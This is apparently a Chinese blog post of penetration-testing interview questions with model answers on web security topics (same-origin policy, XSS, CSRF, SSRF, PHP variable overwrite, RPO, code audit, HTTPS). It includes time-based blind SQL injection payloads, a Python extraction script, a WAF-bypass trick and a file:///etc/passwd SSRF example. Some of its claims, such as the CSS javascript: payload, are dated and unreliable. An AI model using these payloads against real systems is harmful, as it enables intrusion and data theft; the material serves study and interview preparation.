当前位置: 首页 > java >正文

2025年渗透测试面试题总结-2025年HW(护网面试) 70(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 70

一、自我介绍

二、同源策略 & 三大漏洞对比解析

1. 同源策略(SOP)核心规则

2. 三大漏洞攻防对比

三、反射型XSS vs DOM型XSS

四、变量覆盖漏洞高危函数(PHP示例)

五、RPO(Relative Path Overwrite)漏洞精解

攻击原理

实战场景

六、CTF经典题型解析:Web时间盲注

七、代码审计核心方法论

八、CSRF防御三重机制

九、数据分析实战经验

十、HTTPS工作原理详解

 2025年HW(护网面试) 70

1、自我介绍
2、讲一讲同源策略/SSRF/CSRF/XSS
3、反射型XSS和DOM型XSS的区别
4、变量覆盖漏洞涉及的主要函数
5、对RPO漏洞的理解
6、讲一道印象深刻的CTF题
7、讲一讲代码[审计]()的思路
8、讲一讲csrf如何防御
9、有没有做过[数据分析]()
10、https的工作原理

一、自我介绍

网络安全高级工程师 | 5年攻防实战经验

  • 核心领域:Web漏洞挖掘(主导审计50+系统)、SDL建设、红蓝对抗
  • 技术标签:PHP/JAVA代码审计、自动化渗透工具开发、CVE-2024-*** 发现者
  • 当前关注:AI赋能漏洞挖掘、云原生安全加固

二、同源策略 & 三大漏洞对比解析

1. 同源策略(SOP)核心规则
markdown| 对比项 | 同源判定条件 | 受限操作 | |--------------|----------------------------------|--------------------------| | 协议/域名/端口 | 三者完全一致 | Cookie/Storage访问 | | 跨域限制 | 阻止读取跨域资源 | AJAX请求、DOM操作 | | 例外机制 | CORS/JSONP/postMessage | 需显式授权 |
2. 三大漏洞攻防对比
漏洞类型攻击原理防御方案典型案例
SSRF伪造服务端请求内部系统(如file:///etc/passwd白名单校验、禁用危险协议、网络隔离云服务器元数据API泄露
CSRF诱导用户点击恶意链接触发身份操作Anti-CSRF Token、SameSite=Strict银行转账篡改请求
XSS注入恶意脚本到页面执行CSP策略、输入输出编码、DOM Purify存储型XSS窃取用户Cookie

💡 关联风险:XSS可绕过SOP获取页面数据,SSRF可突破网络边界访问内网。


三、反射型XSS vs DOM型XSS

mermaidgraph LR A[触发方式] --> B[反射型XSS:恶意参数通过URL传递,服务端返回含攻击代码的页面] A --> C[DOM型XSS:前端JS直接操作DOM树注入代码,不经过服务端] D[检测重点] --> E[反射型:URL参数、HTTP头输出点] D --> F[DOM型:location.hash/document.write 等函数] G[防御差异] --> H[反射型:服务端输出编码] G --> I[DOM型:前端安全API(如textContent替代innerHTML)]

四、变量覆盖漏洞高危函数(PHP示例)

四大危险函数及场景

  1. extract()
    phpextract($_GET); // 直接覆盖已有变量$auth if ($auth) { admin(); } 
  2. parse_str()
    phpparse_str($input); // 输入"auth=1"覆盖变量 
  3. $$动态变量php
  4. foreach($_GET as $key => $val) { $$key = $val; // 输入?userid=admin覆盖权限 }
  5. mb_parse_str()
    phpmb_parse_str($_POST['data']); // 多字节版本同样危险 

🔥 加固方案:禁用register_globals、严格声明变量作用域、使用$_REQUEST白名单过滤。


五、RPO(Relative Path Overwrite)漏洞精解

攻击原理
markdown1. 利用浏览器解析CSS相对路径的差异: - 请求 `/page.php/ 恶意路径?param=../../evil.css` 2. 服务器返回 `/page.php` 内容但URL路径被篡改 3. 浏览器按篡改后的路径加载CSS,将页面内容当作CSS解析 4. 恶意CSS中注入JS代码:`[color=red]{ background: url('javascript:alert(1)') }` 
实战场景
  • 篡改静态资源路径实现XSS
  • 窃取页面敏感文本(CSS选择器匹配敏感元素)
    修复方案:使用绝对路径引用资源、设置X-Content-Type-Options: nosniff

六、CTF经典题型解析:Web时间盲注

赛题:D^3CTF 2024 - SQL Time Maze
解题步骤

  1. 探测注入点
    sqlid=1' AND IF(ASCII(SUBSTR(database(),1,1))>100, SLEEP(2), 0)-- 
  2. 二分法自动化脚本
    pythonimport requests for i in range(1,50): low, high = 32, 128 while low <= high: mid = (low+high)//2 payload = f"IF(ASCII(SUBSTR((SELECT flag FROM secret LIMIT 1),{i},1))>{mid}, SLEEP(2),0)" start = time.time() requests.get(f"/query?id=1' AND {payload}-- ") if time.time()-start > 2: low = mid+1 else: high = mid-1 flag += chr(low)
  3. 关键技巧
    • 绕过WAF:/*!50000SLEEP(2)*/
    • 加速:并发请求+位运算判断

七、代码审计核心方法论

五步深度审计流程

  1. 入口定位
    • 路由解析(如Spring MVC的@RequestMapping
    • 配置文件(web.xml/config.php
  2. 危险函数追踪
    markdown| 漏洞类型 | 关键函数/API | |------------|----------------------------------| | RCE | eval()/Runtime.exec() | | 文件操作 | FileInputStream()/copy() | | 反序列化 | readObject()/unserialize() |
  3. 数据流分析
    • 污点传播:用户输入 → 过滤函数 → 危险函数
  4. 逆向回溯
    • sink点(如SQL执行函数)回溯至source(如$_GET
  5. 工具链整合
    • 静态:Semgrep(自定义规则)、Fortify
    • 动态:Xdebug + 参数篡改测试

八、CSRF防御三重机制

防御层技术方案适用场景
令牌验证服务端生成随机Token绑定Session关键操作(支付/改密)
同源检测校验Origin/Referer简单请求快速拦截
浏览器机制Cookie设置SameSite=Strict现代浏览器自动防御

⚠️ Token设计要点:一次性使用、绑定用户会话、加密存储。


九、数据分析实战经验

安全大数据分析平台建设

  • 数据源
    • 30TB/日日志(WAF/NIDS/业务系统)
    • 威胁情报(微步/ALPHA)
  • 技术栈
    mermaigraph LR A[Flink实时流] --> B[攻击行为聚类] C[ElasticSearch] --> D[日志检索] E[Spark ML] --> F[异常流量检测]
  • 产出成果
    • APT攻击溯源:挖矿木马传播路径还原
    • 0day预警:异常SQL请求模式捕获Log4j2漏洞利用

十、HTTPS工作原理详解

双向安全通信流程

mermaidsequenceDiagram Client->>Server: ClientHello (TLS版本+加密套件列表) Server->>Client: ServerHello (选定套件) + 证书 Client->>Client: 验证证书链有效性 Client->>Server: 生成Pre-master密钥(用证书公钥加密) Server->>Server: 私钥解密获得Pre-master Note over Client,Server: 双方基于Pre-master生成会话密钥 Client->>Server: 加密传输应用数据(AES-GCM)

关键安全机制

  1. 证书信任链:CA机构根证书 → 中间证书 → 域名证书
  2. 密钥交换:ECDHE算法(前向保密)
  3. 防篡改:HMAC签名校验
  4. 抗重放:随机数+时间戳
http://www.xdnf.cn/news/16361.html

相关文章:

  • Avantage6.6下载与安装教程
  • 差模干扰 共模干扰
  • 【隧道篇 / IPsec】(7.6) ❀ 01. 利用向导快速建立IPsec安全隧道 (点对点) ❀ FortiGate 防火墙
  • 详解力扣高频SQL50题之550. 游戏玩法分析 IV【中等】
  • ClickHouse高性能实时分析数据库-消费实时数据流(消费kafka)
  • MySQL进阶学习与初阶复习第三天
  • CSS3知识补充
  • 如何高效合并音视频文件(时间短消耗资源少)(二)
  • ICMPv4报文类型详解表
  • 人形机器人指南(八)操作
  • Xinference vs SGLang:详细对比分析
  • MybatisPlus-18.插件功能-分页插件基本用法
  • Jmeter的元件使用介绍:(五)定时器详解
  • 无需云服务器的内网穿透方案 -- cloudflare tunnel
  • 【AI周报】2025年7月26日
  • 什么是ICMP报文?有什么用?
  • Android Data Binding 深度解析与实践指南
  • easy-llm-cli的安装和使用
  • 【web应用】基于Vue3和Spring Boot的课程管理前后端数据交互过程
  • Vue 3 与 Element Plus 中的 /deep/ 选择器问题
  • 论文阅读-RaftStereo
  • haproxy配置详解
  • QT核心————信号槽
  • 外带服务的温度:藏在包装里的“生活共情力”
  • [RPA] 日期时间练习案例
  • 二维数组相关学习
  • FastAPI入门:demo、路径参数、查询参数
  • 【图像理解进阶】如何在自己的数据集上释放segment anything模型方案的潜力?
  • 【GaussDB】构建一个GaussDB的Docker镜像
  • MySQL数据库本地迁移到云端完整教程